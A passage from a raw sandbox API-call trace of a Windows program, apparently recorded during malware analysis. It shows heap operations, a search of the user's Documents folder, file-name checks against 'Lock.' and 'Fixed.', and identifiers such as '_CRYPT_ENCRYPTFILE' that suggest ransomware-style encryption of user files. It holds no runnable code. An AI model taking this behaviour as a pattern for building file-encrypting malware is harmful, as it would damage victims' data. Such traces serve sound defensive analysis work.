(HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e558d8 [0268.558] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ypyYdQHgVdPHUEe.odt", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt", lpFilePart=0x8cf650*="ypyYdQHgVdPHUEe.odt") returned 0x2d [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.558] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt" (normalized: "c:\\users\\fd1hvy\\documents\\ypyydqhgvdphuee.odt")) returned 0xffffffff [0268.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.559] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zP4h.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P4h.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0268.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4h.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.560] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0268.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0268.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zP4h.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P4h.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4h.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0268.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.563] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0268.563] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0268.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0268.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.564] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0268.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0268.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0268.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0268.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.566] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/zP4h.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93d9c80, ftCreationTime.dwHighDateTime=0x1d59d68, ftLastAccessTime.dwLowDateTime=0xd7de4a50, ftLastAccessTime.dwHighDateTime=0x1d5c94a, ftLastWriteTime.dwLowDateTime=0xd7de4a50, ftLastWriteTime.dwHighDateTime=0x1d5c94a, nFileSizeHigh=0x0, nFileSizeLow=0x4dbb, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="zP4h.xlsx", cAlternateFileName="ZP4H~1.XLS")) returned 0xa87050 [0268.566] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0268.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0268.567] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.567] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.567] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.568] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.568] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.568] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.568] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.568] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0268.568] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0268.569] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0268.569] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0268.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0268.570] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.570] RtlAllocateHeap (HeapHandle=0x970000, 